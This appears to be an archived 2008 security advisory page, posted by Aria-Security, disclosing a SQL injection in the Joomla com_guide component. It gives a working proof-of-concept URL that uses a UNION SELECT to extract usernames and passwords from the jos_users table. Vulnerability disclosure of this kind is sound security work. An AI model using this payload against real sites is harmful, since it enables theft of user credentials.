Computer Security

Security Advisory: Joomla components com_guide "category" Remote SQL Injection [Aria-Security]
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1520-1] New smarty packages fix arbitrary code execution

  [SECURITY] [DSA 1519-1] New horde3 packages fix information disclosure

  Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities

  EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities

From:no-reply_(at)_aria-security.net <no-reply_(at)_aria-security.net>
Date:17.03.2008
Subject:Joomla components com_guide "category" Remote SQL Injection [Aria-Security]


Aria-Security Team (Persian Security Network)
http://forum.aria-security.com
--------------------------------
Join our english forum @ http://forum.aria-security.com
Shoutz: Aura, Null, Kinglet, t3rr0r1st
Joomla components com_guide "category" Remote SQL Injection



Poc:

index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,
password,3,4,5,6,7,8/**/from/**/jos_users/*


Regards,
The-0utl4w
Edit/Delete Message
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru